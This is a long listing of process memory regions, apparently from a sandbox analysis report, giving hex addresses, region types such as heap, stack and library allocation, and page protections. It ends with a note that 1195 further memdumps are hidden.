2B57000
|
stack
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
2A35000
|
heap
|
page read and write
|
||
8070000
|
trusted library allocation
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
84A0000
|
trusted library allocation
|
page read and write
|
||
743E000
|
heap
|
page read and write
|
||
6111000
|
heap
|
page read and write
|
||
6137000
|
heap
|
page read and write
|
||
589C000
|
heap
|
page read and write
|
||
60A6000
|
heap
|
page read and write
|
||
589C000
|
heap
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
775D000
|
stack
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
4FD8000
|
trusted library allocation
|
page read and write
|
||
4DC4000
|
heap
|
page read and write
|
||
6192000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
909000
|
heap
|
page read and write
|
||
856000
|
heap
|
page read and write
|
||
6FA0000
|
trusted library allocation
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
4B19000
|
trusted library allocation
|
page read and write
|
||
856000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
FC000
|
stack
|
page read and write
|
||
5C5B000
|
heap
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
719A000
|
stack
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
810D000
|
stack
|
page read and write
|
||
4DD5000
|
heap
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
3043000
|
trusted library allocation
|
page execute and read and write
|
||
725D000
|
stack
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
7491000
|
heap
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
2A38000
|
heap
|
page read and write
|
||
4AF0000
|
heap
|
page read and write
|
||
2A03000
|
heap
|
page read and write
|
||
60AA000
|
heap
|
page read and write
|
||
D10000
|
direct allocation
|
page read and write
|
||
565C000
|
heap
|
page read and write
|
||
5A24000
|
trusted library allocation
|
page read and write
|
||
3090000
|
trusted library allocation
|
page read and write
|
||
33BE000
|
stack
|
page read and write
|
||
848E000
|
stack
|
page read and write
|
||
5F20000
|
trusted library allocation
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
8080000
|
trusted library allocation
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
5819000
|
trusted library allocation
|
page read and write
|
||
422F000
|
stack
|
page read and write
|
||
2D3C000
|
heap
|
page read and write
|
||
5BD1000
|
heap
|
page read and write
|
||
5C5B000
|
heap
|
page read and write
|
||
7FB48000
|
trusted library allocation
|
page execute and read and write
|
||
73EE000
|
stack
|
page read and write
|
||
6E6D000
|
stack
|
page read and write
|
||
6105000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
28B0000
|
heap
|
page read and write
|
||
6F90000
|
heap
|
page execute and read and write
|
||
1410000
|
heap
|
page read and write
|
||
2FF0000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
699D000
|
stack
|
page read and write
|
||
5C38000
|
heap
|
page read and write
|
||
91A000
|
heap
|
page read and write
|
||
6F0D000
|
stack
|
page read and write
|
||
2EEE000
|
stack
|
page read and write
|
||
7790000
|
trusted library allocation
|
page execute and read and write
|
||
2A3F000
|
heap
|
page read and write
|
||
6117000
|
heap
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
FBD000
|
stack
|
page read and write
|
||
29B8000
|
heap
|
page read and write
|
||
3EC000
|
stack
|
page read and write
|
||
4678000
|
trusted library allocation
|
page read and write
|
||
587C000
|
trusted library allocation
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
905000
|
heap
|
page read and write
|
||
4940000
|
heap
|
page read and write
|
||
5890000
|
heap
|
page read and write
|
||
2CEE000
|
stack
|
page read and write
|
||
57CE000
|
heap
|
page read and write
|
||
4BB7000
|
heap
|
page read and write
|
||
1EE000
|
stack
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
5C2B000
|
heap
|
page read and write
|
||
829000
|
heap
|
page read and write
|
||
4A68000
|
trusted library allocation
|
page read and write
|
||
4234000
|
trusted library allocation
|
page read and write
|
||
4FC4000
|
trusted library allocation
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
29D7000
|
heap
|
page read and write
|
||
5812000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
8500000
|
trusted library allocation
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
48E0000
|
heap
|
page execute and read and write
|
||
792000
|
direct allocation
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
478E000
|
stack
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
312C000
|
heap
|
page read and write
|
||
481E000
|
stack
|
page read and write
|
||
2F4F000
|
unkown
|
page read and write
|
||
C9E000
|
stack
|
page read and write
|
||
842F000
|
stack
|
page read and write
|
||
83F000
|
heap
|
page read and write
|
||
5C3B000
|
heap
|
page read and write
|
||
2F8E000
|
stack
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
6440000
|
trusted library allocation
|
page read and write
|
||
594D000
|
heap
|
page read and write
|
||
60A0000
|
heap
|
page read and write
|
||
7403000
|
heap
|
page read and write
|
||
2BFA000
|
heap
|
page read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
868000
|
heap
|
page read and write
|
||
2919000
|
heap
|
page read and write
|
||
6F4F000
|
stack
|
page read and write
|
||
530F000
|
stack
|
page read and write
|
||
5BA0000
|
trusted library allocation
|
page read and write
|
||
577D000
|
heap
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
4690000
|
heap
|
page execute and read and write
|
||
6177000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
2B1C000
|
stack
|
page read and write
|
||
2710000
|
heap
|
page read and write
|
||
60FF000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
6470000
|
trusted library allocation
|
page read and write
|
||
7390000
|
trusted library section
|
page read and write
|
||
2F90000
|
trusted library allocation
|
page read and write
|
||
702F000
|
heap
|
page read and write
|
||
880B000
|
stack
|
page read and write
|
||
6955000
|
heap
|
page execute and read and write
|
||
2FA4000
|
trusted library allocation
|
page read and write
|
||
4580000
|
trusted library allocation
|
page read and write
|
||
4856000
|
trusted library allocation
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
541D000
|
trusted library allocation
|
page read and write
|
||
482A000
|
trusted library allocation
|
page read and write
|
||
6113000
|
heap
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
883000
|
heap
|
page read and write
|
||
844E000
|
stack
|
page read and write
|
||
5C41000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
5869000
|
trusted library allocation
|
page read and write
|
||
24FA000
|
stack
|
page read and write
|
||
577B000
|
heap
|
page read and write
|
||
786000
|
direct allocation
|
page read and write
|
||
60A9000
|
heap
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
4267000
|
trusted library allocation
|
page execute and read and write
|
||
D30000
|
heap
|
page read and write
|
||
5C41000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
6950000
|
heap
|
page execute and read and write
|
||
2987000
|
heap
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
4540000
|
heap
|
page read and write
|
||
831E000
|
stack
|
page read and write
|
||
4FB4000
|
trusted library allocation
|
page read and write
|
||
91D000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
27C9000
|
stack
|
page read and write
|
||
304D000
|
trusted library allocation
|
page execute and read and write
|
||
5C24000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
7550000
|
trusted library allocation
|
page read and write
|
||
6E5F000
|
stack
|
page read and write
|
||
574B000
|
heap
|
page read and write
|
||
594D000
|
heap
|
page read and write
|
||
6113000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
4800000
|
heap
|
page read and write
|
||
868000
|
heap
|
page read and write
|
||
732F000
|
heap
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
866E000
|
heap
|
page read and write
|
||
457D000
|
trusted library allocation
|
page execute and read and write
|
||
6179000
|
heap
|
page read and write
|
||
922000
|
heap
|
page read and write
|
||
4B21000
|
trusted library allocation
|
page read and write
|
||
74AE000
|
stack
|
page read and write
|
||
4D98000
|
heap
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
7FE000
|
heap
|
page read and write
|
||
2B6E000
|
heap
|
page read and write
|
||
5C52000
|
heap
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
8A10000
|
trusted library allocation
|
page read and write
|
||
8572000
|
trusted library allocation
|
page read and write
|
||
7D40000
|
heap
|
page read and write
|
||
61A7000
|
heap
|
page read and write
|
||
7412000
|
heap
|
page read and write
|
||
4E2C000
|
heap
|
page read and write
|
||
697B000
|
stack
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
73C0000
|
heap
|
page read and write
|
||
48BB000
|
trusted library allocation
|
page read and write
|
||
4AF0000
|
heap
|
page read and write
|
||
76C9000
|
heap
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
74AE000
|
heap
|
page read and write
|
||
77A0000
|
trusted library allocation
|
page read and write
|
||
89A0000
|
trusted library allocation
|
page read and write
|
||
50BF000
|
trusted library allocation
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
7ED000
|
heap
|
page read and write
|
||
460E000
|
stack
|
page read and write
|
||
4839000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
8F4000
|
heap
|
page read and write
|
||
2A35000
|
heap
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
4ED1000
|
heap
|
page read and write
|
||
4EA4000
|
heap
|
page read and write
|
||
6438000
|
trusted library allocation
|
page read and write
|
||
2D7E000
|
stack
|
page read and write
|
||
1790000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
4E2C000
|
heap
|
page read and write
|
||
60AC000
|
heap
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
5658000
|
heap
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
279E000
|
stack
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
520E000
|
stack
|
page read and write
|
||
6DDF000
|
stack
|
page read and write
|
||
5140000
|
heap
|
page read and write
|
There are 1195 hidden memdumps, click here to show them.